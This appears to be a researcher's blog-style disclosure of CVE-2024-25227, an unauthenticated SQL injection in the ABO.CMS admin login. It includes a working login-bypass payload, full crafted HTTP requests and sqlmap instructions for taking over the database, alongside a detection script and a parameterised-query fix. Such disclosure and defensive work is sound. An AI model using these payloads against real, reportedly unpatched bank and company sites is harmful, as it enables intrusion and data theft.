Writer: Xande :0

Understanding the Impact of CVE-2024-25227: What You Need to Know and How It Was Discovered

Updated: Mar 15



SQLi :)

I will start by detailing the vulnerability for everyone interested in the specifics, and later discuss how I discovered it and some information about the vendor.

ABO.CMS-Login-SQLi-CVE-2024-25227

CVE-2024-25227

Date: 23/02/2024

Tested on ABO.CMS 5.8

Vendor: ABO.CMS

Vendor URL: https://abocms.ru


Components affected

The tb_login parameter of the admin login page (login.aspx) is vulnerable to SQL injection: its value is placed into a database query without sanitisation or parameterisation, so a remote, unauthenticated attacker can inject and execute arbitrary SQL.


Type

Remote


Implications

The implications of this vulnerability are critical. With boolean-based blind, error-based, stacked-query, time-based blind and UNION-based injection all available to a would-be attacker, and the injection point sitting on a pre-authentication page, an attacker can read sensitive information, manipulate data and, under certain conditions, take control of the underlying database server.

All of the techniques I have verified as working against this vulnerability are listed under "Techniques I have vetted" below.


As the vendor has not responded to my requests for the past 14+ days, I am sceptical that they will fix this vulnerability in a timely manner, and I would personally switch CMSs until these vulnerabilities have been addressed and fixed (if possible). Additionally, if you continue to use this CMS, heightened vigilance and proactive monitoring are essential to detect and mitigate exploitation attempts before they escalate into significant security incidents.
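As an added example of the proactive monitoring mentioned above (this is my own illustration, not code from the advisory, the CVE record or ABO.CMS), the following Python scores login POST bodies whose tb_login value carries the techniques listed on this page. The sample bodies are constructed; the third is the advisory's own payload exactly as URL-encoded later on this page, and the fourth is a stacked/time-based probe in the same style. The form body must be URL-decoded before matching: the payload carries "=" and spaces encoded as %3d and %20, so a rule run against the raw body misses the tautology.

```python
import re
from urllib.parse import parse_qs

# Signatures for the techniques the advisory lists against tb_login: boolean
# tautologies, comment truncation, UNION, stacked queries and time-based delays.
RULES = {
    "tautology":  re.compile(r"\b(?:or|and)\b\s*(?:\d+\s*=\s*\d+|'[^']*'\s*=\s*'[^']*')", re.I),
    "comment":    re.compile(r"--|/\*"),
    "union":      re.compile(r"\bunion\b(?:\s+all)?\s+select\b", re.I),
    "stacked":    re.compile(r";\s*(?:select|insert|update|delete|drop|exec|declare|waitfor)\b", re.I),
    "time_delay": re.compile(r"waitfor\s+delay|\bsleep\s*\(|\bbenchmark\s*\(", re.I),
}
STRONG = {"tautology", "union", "stacked", "time_delay"}

# Constructed sample bodies (not captured traffic). [2] is the advisory's payload exactly
# as URL-encoded on this page; [3] is a stacked/time-based probe in the same style.
SAMPLE_BODIES = [
    "VIEWSTATE=abc&EVENTVALIDATION=def&tb_login=jsmith&tb_pwd=Winter2024&b_submit=+%C3+%D7+%CE+%C5+",
    "VIEWSTATE=abc&EVENTVALIDATION=def&tb_login=o%27brien&tb_pwd=pa%26ss&b_submit=+%C3+%D7+%CE+%C5+",
    "VIEWSTATE=abc&EVENTVALIDATION=def&tb_login=27872164'%20or%202579%3d2579--%20&tb_pwd=hf%36nb4u%84X5&b_submit=+%C3+%D7+%CE+%C5+",
    "VIEWSTATE=abc&EVENTVALIDATION=def&tb_login=admin'%3B%20WAITFOR%20DELAY%20'0%3A0%3A5'--%20&tb_pwd=x&b_submit=+%C3+%D7+%CE+%C5+",
]

def rules_hit(value):
    """Names of the rules matching an already-decoded parameter value, in RULES order."""
    return [name for name, rx in RULES.items() if rx.search(value)]

def is_suspicious(value, hits):
    """A strong rule alone is enough; a bare comment sequence only counts alongside a quote,
    so a legitimate apostrophe (o'brien) or a double hyphen in a name is not flagged."""
    return bool(STRONG & set(hits)) or ("comment" in hits and "'" in value)

def analyze_body(raw_body, param="tb_login"):
    """Decode the form body first: parse_qs turns %27, %3d, %20 and + back into ', =, space.
    Only the first '=' of each pair separates name from value, so the encoded %3d inside
    the payload survives as part of tb_login instead of splitting it."""
    fields = parse_qs(raw_body, keep_blank_values=True, errors="replace")
    value = fields.get(param, [""])[0]
    hits = rules_hit(value)
    return {"value": value, "hits": hits, "suspicious": is_suspicious(value, hits)}

if __name__ == "__main__":
    for body in SAMPLE_BODIES:
        r = analyze_body(body)
        print(("ALERT " if r["suspicious"] else "ok    ") + repr(r["value"]), r["hits"])
```

IIS access logs do not record POST bodies, so this check has to run where the body is visible: a WAF, a reverse proxy, or request logging inside the application.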


Test Environment

The test environment was IIS 7.5/8.5 with Microsoft SQL Server 2008 R2 SP3, running ASP.NET (.aspx) pages and PHP.


Severity and Impact on Users/Clients

As far as I can tell, this could have quite a big impact on clients of the CMS. From the developer:


"The system was chosen by more than 3,000 companies"


"Including: InvestBank, SvyazBank, Slavyansky Credit, Rossium Concern, AmiBank, Arktur, Moscow Department of Education, RegionInvestBank, Housing Finance Bank, Foreign Economic Information Portal, APC, Russian Standard Bank, BikeLand, Federal Bank for Innovation and Development, RoboForex, PiterGaz, MotoPlaneta, SDM-Bank, XportMedia, etc."



It is frightening to see the potential impact, as one of the main attractions of this CMS was in part that it was designed for use by banks. To make this worse, the vendor assured customers it was secure and that "The coding standards and architecture used in development eliminate the appearance of vulnerabilities such as SQL injection or cross-site scripting."

"ABO.CMS - Secure web application!"


Discovery

I was originally perusing various content management systems (CMS) for potential vulnerabilities. ABO.CMS was interesting to me as the first Eastern European CMS I had come across, and because of its vastly differing use cases by edition. It was the first time I had seen a CMS with tiers like it.


Once I had obtained a sample of ABO.CMS 5.8, I dived into its modules and found an endpoint within an admin login module. I looked into the POST form data and, through some inspection, found that the "tb_login" parameter was vulnerable to SQL injection. With this I was able to gain admin on the underlying module of the website, and I could inject SQL using many different techniques, as mentioned previously.


Here are the POST requests to the vulnerable module, with the vulnerable parameter (tb_login): the original request and the SQLi-laden request.


original request

POST /login.aspx HTTP/1.1
Host: localhost
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/535.36 (KHTML, like Gecko) Chrome/104.0.5735.134 Safari/527.36
Connection: close
Cache-Control: max-age=0
Cookie: ASP.NET_SessionId=asd123hstjj
Upgrade-Insecure-Requests: 1
Referer: http://ip
Content-Type: application/x-www-form-urlencoded
Content-Length: 100

VIEWSTATE=%2ASDkjdkjfkgajsslfk&EVENTVALIDATION=%2;llkfopkorjaeitjru123&tb_login=**USERNAME**&tb_pwd=**PASSWORD**&b_submit=+%C3+%D7+%CE+%C5+


altered request (SQLi)

(EXPLOIT to bypass the login authentication; grants you admin)

POST /login.aspx HTTP/1.1
Host: localhost
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/535.36 (KHTML, like Gecko) Chrome/104.0.5735.134 Safari/527.36
Connection: close
Cache-Control: max-age=0
Cookie: ASP.NET_SessionId=asd123hstjj
Upgrade-Insecure-Requests: 1
Referer: http://ip
Content-Type: application/x-www-form-urlencoded
Content-Length: 100

VIEWSTATE=%2ASDkjdkjfkgajsslfk&EVENTVALIDATION=%2;llkfopkorjaeitjru123&tb_login=27872164'%20or%202579%3d2579--%20&tb_pwd=hf%36nb4u%84X5&b_submit=+%C3+%D7+%CE+%C5+


Here is the payload without URL encoding:

27872164' or 2579=2579--


In the modified request, the single quote in "27872164'" closes the string literal the application builds around tb_login, "or 2579=2579" appends a condition that is always true, and "--" turns the remainder of the original query (including the password comparison against tb_pwd) into a comment, so the injected condition is what the database actually evaluates. The WHERE clause therefore matches every account and the login succeeds without valid credentials; the account signed in is the administrator, giving unauthenticated access to the control panel with admin rights.
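To make the mechanism concrete, here is an added Python example (my own illustration, not ABO.CMS code; the table, the account names and the plaintext password column are constructed stand-ins) that reproduces the query shape a concatenating login handler builds, runs the advisory's payload against it in SQLite, and shows the parameterised form that closes the hole. The "--" comment behaves the same way in SQLite as in Microsoft SQL Server, which is why the bypass works even if the real handler hashes passwords: the password check is never reached.

```python
import sqlite3

# Constructed stand-in for the CMS's account table. This is NOT ABO.CMS's real schema or
# code; plaintext passwords are a simplification that does not affect the bypass.
SCHEMA = """
CREATE TABLE users (id INTEGER PRIMARY KEY, login TEXT NOT NULL, pwd TEXT NOT NULL, is_admin INTEGER NOT NULL);
INSERT INTO users (login, pwd, is_admin) VALUES ('admin',  'S3cret!', 1);
INSERT INTO users (login, pwd, is_admin) VALUES ('editor', 'hunter2', 0);
"""

# The advisory's payload, URL-decoded (the trailing space comes from the final %20).
PAYLOAD = "27872164' or 2579=2579-- "

def open_db():
    """In-memory SQLite database seeded with the constructed accounts."""
    conn = sqlite3.connect(":memory:")
    conn.executescript(SCHEMA)
    return conn

def build_vulnerable_query(tb_login, tb_pwd):
    """String-concatenated query: the attacker's quote closes the literal and the
    rest of tb_login becomes SQL. Shown separately so the effective query can be inspected."""
    return ("SELECT login, is_admin FROM users WHERE login = '" + tb_login +
            "' AND pwd = '" + tb_pwd + "'")

def vulnerable_login(conn, tb_login, tb_pwd):
    """Returns the login name of the account the handler would sign in, or None.
    With PAYLOAD the WHERE clause becomes  login = '27872164' or 2579=2579  and everything
    after -- (the password check) is a comment, so every row matches and the first row,
    the admin account, is returned."""
    row = conn.execute(build_vulnerable_query(tb_login, tb_pwd)).fetchone()
    return row[0] if row else None

def safe_login(conn, tb_login, tb_pwd):
    """The fix: bind the values as parameters. The driver passes them separately from the
    statement text, so a quote in tb_login is just a character inside the compared string."""
    row = conn.execute(
        "SELECT login, is_admin FROM users WHERE login = ? AND pwd = ?",
        (tb_login, tb_pwd),
    ).fetchone()
    return row[0] if row else None

if __name__ == "__main__":
    db = open_db()
    print("effective query:", build_vulnerable_query(PAYLOAD, "hf6nb4u84X5"))
    print("vulnerable handler signs in as:", vulnerable_login(db, PAYLOAD, "hf6nb4u84X5"))
    print("parameterised handler signs in as:", safe_login(db, PAYLOAD, "hf6nb4u84X5"))
```

The first row coming back as admin matches what the advisory reports; on a real deployment the row order depends on the table and query, but any row is enough to be logged in as that user.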



If you want to go further into the underlying system, any of the techniques mentioned earlier can be used with a tool like sqlmap to automate the process.


Techniques I have vetted:

Boolean-based blind, error-based, stacked queries, time-based blind, and union queries.


It is incredibly easy to do, and with it you can completely take over the database and, under the conditions noted above, the underlying system.


All you need to do is save the request to a file, put a "*" where the payload would go (sqlmap treats it as the injection point), and sqlmap will do the rest:


POST /login.aspx HTTP/1.1
Host: localhost
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/535.36 (KHTML, like Gecko) Chrome/104.0.5735.134 Safari/527.36
Connection: close
Cache-Control: max-age=0
Cookie: ASP.NET_SessionId=asd123hstjj
Upgrade-Insecure-Requests: 1
Referer: http://%2Aip%2A/image/admin/login.aspx?ReturnUrl=%2FImage%2FAdmin%2Fdefault.aspx
Content-Type: application/x-www-form-urlencoded
Content-Length: 100

VIEWSTATE=%2ASDkjdkjfkgajsslfk&EVENTVALIDATION=%2;llkfopkorjaeitjru123&tb_login=*&tb_pwd=hf%36nb4u%84X5&b_submit=+%C3+%D7+%CE+%C5+

(saved as request.txt)


sqlmap -r request.txt --batch --banner




Who are ABO.CMS?


Here is a little backstory on ABO.CMS, from the pieces I have been able to piece together and translate.


Our vendor is ABO.CMS, which was previously known as Armex BackOffice in the early 2000s: "A commercial content management system originally known as Armex BackOffice and developed by Armex in 2004." - via EDSD - ABO CMS – creating web applications with modular architecture (edsd.com)


It appears to be a CMS mainly used in Russia and Eastern Europe, with several editions built for slightly different purposes:

ABO.CMS: Start. Designed to quickly create a website with minimal financial investment, presenting basic information about the company and its services. Includes an installer, the system core and 6 software modules. Cost: 2,900 rubles.

ABO.CMS: Promo. Designed to support advertising campaigns promoting goods and services on the Internet; in the shortest possible time you can develop a website that presents the object of advertising dynamically and in detail. Includes an installer, the system core and 11 software modules. Cost: 5,900 rubles.

ABO.CMS: Community. For creating online communities: multifunctional information portals where users can make new acquaintances, communicate with each other, create their own blogs and photo galleries, and much more. Includes an installer, the system core and 18 software modules. Cost: 9,900 rubles.

ABO.CMS: Corporate. For corporate websites, developing the company's openness and raising the overall level of service for partners and clients. Includes an installer, the system core and 22 software modules. Cost: 11,900 rubles.

ABO.CMS: Shop. For creating full-fledged, multi-profile online stores in which the purchasing process is meant to be not only useful but also enjoyable. Includes an installer, the system core and 14 software modules. Cost: 14,300 rubles.

ABO.CMS: Business. Intended for comprehensive commercial and social activity on the Internet, taking into account the subtleties and specifics of your business. Includes an installer, the system core and 26 software modules. Cost: 23,900 rubles.


It appears to have quite a large customer base; again, they state that 3,000 companies use their software, many of them in the banking sector. They also state that "The system is registered in the official register of Computer Programs of the Russian Agency for Patents and Trademarks." They share a picture as validation of this:



The official CVE entry from MITRE is here, as is my more formal GitHub documentation:


Thanks for reading! --TTA


